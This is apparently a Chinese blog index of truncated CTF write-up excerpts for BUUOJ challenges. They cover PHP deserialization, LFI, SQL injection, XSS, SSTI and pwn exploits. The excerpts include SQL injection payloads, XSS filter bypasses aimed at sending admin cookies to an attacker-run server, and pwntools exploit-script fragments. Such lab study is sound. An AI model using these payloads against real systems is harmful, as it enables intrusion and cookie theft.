buu
  • 2024-11-17BUU CODE REVIEW 1 1
    BUUCODEREVIEW11打开实例发现php代码,代码审计一波看到unserialize(),初步判断这题存在php反序列化分析代码:需要GET传参传入pleaseget=1需要POST传参传入pleasepost=2需要POST传入md51和md52,使得md51的md5加密后的MD5值弱相等,参数值不相等需要POST传入obj,用来反序列化
  • 2024-11-14BUU CODE REVIEW 1
    BUUCODEREVIEW1php代码审计classBUU{public$correct="";public$input="";publicfunction__destruct(){try{$this->correct=base64_encode(uniqid());if($this->correct===$this-&g
  • 2024-11-09BUU LFI COURSE 1
    BUULFICOURSE1php文件包含漏洞|Chybetahint在标题了。<?php/***CreatedbyPhpStorm.*User:jinzhao*Date:2019/7/9*Time:7:07AM*/highlight_file(__FILE__);if(isset($_GET['file'])){$str=$_GET['file'];include
  • 2024-11-09BUU BRUTE 1 wp
    BUUBRUTE1引子·burpsuite实战指南尝试一下发现用户名和密码是分离的,手动输入常用用户名,发现为admin,得到提示密码是四位数字。之后用bpIntruder尝试爆破,设置payload需要注意的是如果请求间隔太短会报429错误,fix一下请求间隔时间或者设置自动控制429即可。在
  • 2024-09-21BUU XSS COURSE 1
    启动靶机有留言板和登录功能,很明显是存储性xss,通过留言功能插入xss代码,获取cookie登录后台先测试过滤<script>alert(1);</script>查看源代码发现script被过滤<inputonfocus="alert('xss');">好像只过滤了script找一个xss平台或者自己用服务器接受cookie'"><inputonfocu
  • 2024-07-30BUU_ciscn_2019_c_1
    ciscn_2019_c_1先查看保护机制,64位开了NX保护发现应该是用不了ret2syscall的v4是格式化输入的,不存在溢出55[v4!=2退出里面的小循环,=1进入encrypt()函数]{.kbd.red}看到s和gets(),填充为0x50+8发现puts()->re2libc然后程序有一个死循环:::warningif(v0>=strlen(s)
  • 2024-07-15buu Youngter-drive
    查壳,有壳,upx脱壳(upx.exe-d)进ida看主函数又是这种粉色的没见过的函数,速查CreateMutexW可以创建或打开命名的或未命名的互斥体对象。简单来说就是后面的多线程同时只会同时运行一个线程CreateThread就是创建线程来运行CloseHandle就是关闭线程在这道题中就是StartAddr
  • 2024-06-21BUU SQL COURSE 1
    1、链接页面2、尝试admin+万能密码测试登录发现登录不了,看来这条路走不通了3、查看那几条新闻,发现url有点奇怪4、先fn+f12查看页面,再fn+f5,找到原始请求的url5、访问这个url,出现了新闻1的内容http://dcd38613-6dfd-4e63-80c6-a7af2ea84ebd.node5.buuoj.cn:81/backend/c
  • 2024-06-15buu SSTI
    buuSSTI[CSCCTF2019Qual]FlaskLight查看源码get传search有回显确定是ssti用脚本去查找可用的子类,参考连接看看是否有过滤猜测globals被过滤采用拼接绕过发现config可以用[BJDCTF2020]Cookieissostable查看源码,发现file://被禁掉了flag.phpadmin登
  • 2024-06-08buu 代码审计
    代码审计[HCTF2018]WarmUp查看源码访问source.php<?phphighlight_file(__FILE__);classemmm{publicstaticfunctioncheckFile(&$page){$whitelist=["source"=>"source.php","hint"
  • 2024-04-14buu RCE1
    RCE代码执行[极客大挑战2019]Knife蚁剑scandir函数:返沪指定目录中的文件和目录的数组sscandir(directory,sorting_order,context);//语法用var_dump+scandir函数查看目录下的所有文件Syc=var_dump(scandir('/'));页面而背景颜色会覆盖代码执行的结果提交请求后查看
  • 2024-03-21buu反序列化
    反序列化[MRCTF2020]Ezpop简单的pop查看源码用反序列化触发wakeup方法,preg_match将$this->source进行字符串正则匹配,$show1会被当成字符串进而触发tostringtostring是把对象当成字符串调用时被触发,$show=newShow();$show1=newShow();$show->source=$show1;get方法
  • 2024-03-20BUU之misc入门
    BUU之misc题目你竟然赶我走给了个附件,就是这个表情包。。010打开,Ctrl+F搜flag直接秒了flagISflag{stego_is_s0_bor1ing}题目来首歌吧打开附件是一首歌,魔性小猫,听着听着发现有摩斯电码的声音,打开Audacity看看发现音频分了左右声道对应----.题目金2+1胖附件
  • 2024-03-19buu第四页笔记
    1、护网杯_2018_gettingstart 64位,RELRO半开,Canary,NX,PIE全开 就是普通栈溢出   Exp:fromstructimportpackfromLibcSearcherimport*frompwnimport*#context(os='linux',arch='amd64',log_level='debug')context(os='linux
  • 2024-03-14buu第一页复盘
    这里就对之前第一遍没写出来的题目再写一次wp写在之前贴一下我的模块文件frompwnimport*fromLibcSearcherimport*fromstructimport*defdebug(io):gdb.attach(proc.pidof(io)[0])pause()defshow_libc_base(libc_base):print("-----------libc_
  • 2024-02-01BUU USB
    USB压缩包里有个rar和ftm文件,打开压缩包发现文件头被破坏010打开后发现文件头被修改过,应该是74而不是7A修改过后即可打开压缩包图片里的蓝色通道里有一个二维码,扫码得到ci{v3erf_0tygidv2_fc0}在010中发现压缩包和key.pcap文件,通过binwalk分离后发现压缩包里面也是ke
  • 2023-11-22buu第二页
    2、wustctf2020_getshell32位,NX保护,RELEO半开 gdb动态调试一下,是一道简单的栈溢出Exp:fromstructimportpackfromLibcSearcherimport*frompwnimport*#context(os='linux',arch='amd64',log_level='debug')context(os='linux',arch=�
  • 2023-10-30 捡起ctf学习 day3 BUU SQL COURSE 1
    一.BUUSQLCOURSE1SQL注入类型字符型、数字型、搜索型过程F12找到了隐藏url,存在get请求传参?id=0unionselect1,group_concat(table_name)frominformation_schema.tableswheretable_schema=database()#1、判断是否存在注入、注入是字符型还是数字型id=1orderby
  • 2023-09-17buu pwn wp(持续更新)
    1、warmup_csaw_2016main函数如下__int64__fastcallmain(inta1,char**a2,char**a3){chars[64];//[rsp+0h][rbp-80h]BYREFcharv5[64];//[rsp+40h][rbp-40h]BYREFwrite(1,"-WarmUp-\n",0xAuLL);write(1,"WOW:",4uLL);
  • 2023-07-30WP(BUU)
    最近要做点堆题练练手感了,回buu记不住是第几个题了,直接标个号列这里吧0x01mrctf2020_easyoverflow简单的栈上覆写呵呵感觉这题最费劲的是找那个破b字符串frompwnimport*fromLibcSearcherimport*context(arch='amd64',os='linux')#context(log_level='debug')r=re
  • 2023-07-09BUU第二页
    ez_pz_hackover_2016frompwnimport*context(os='linux',arch='i386',log_level='debug')p=remote('node4.buuoj.cn',27986)p.recvuntil("0x")s=int(p.recv(8),16)print(hex(s))shellcode=asm(sh
  • 2023-05-09buu刷题记
    [强网杯2019]随便注?inject=-1';showdatabases%23?inject=-1';showtablesfrom`supersqli`%23?inject=-1';showcolumnsfrom`1919810931114514`%23得知flag在supersqli库的1919810931114514的flag列下而且select|update|delete|drop|insert|where都被过滤解法1?inje
  • 2023-04-14buu刷题
    [GYCTF2020]Ezsqli知识点ascii比较盲注解题过程输入id=1的时候返回nu1l然后先判断是数字型还是字符型因为一些东西被过滤了输入1&&1=2返回因为这个使用某些字符会导致post传参时造成歧义这是将paylaodurl编码所以判断为字符型由于过滤了union所以不能使用
  • 2023-04-01BUUOJ-BUU LFI COURSE 1 1
    看题目是个本地文件包含  简单审计以下,包含一个file参数并包含这个参数所代表的文件。  根据之前在buuoj做题时遇到的flag,盲猜是/flag 
  • 2023-03-23【BUU刷题日记】--第二周
    【BUU刷题日记】——第二周一、[WUSTCTF2020]朴实无华1目录爆破使用dirsearch扫描发现没有结果,因为如果dirsearch请求过快则会导致超出服务器最大请求,扫描不出本来可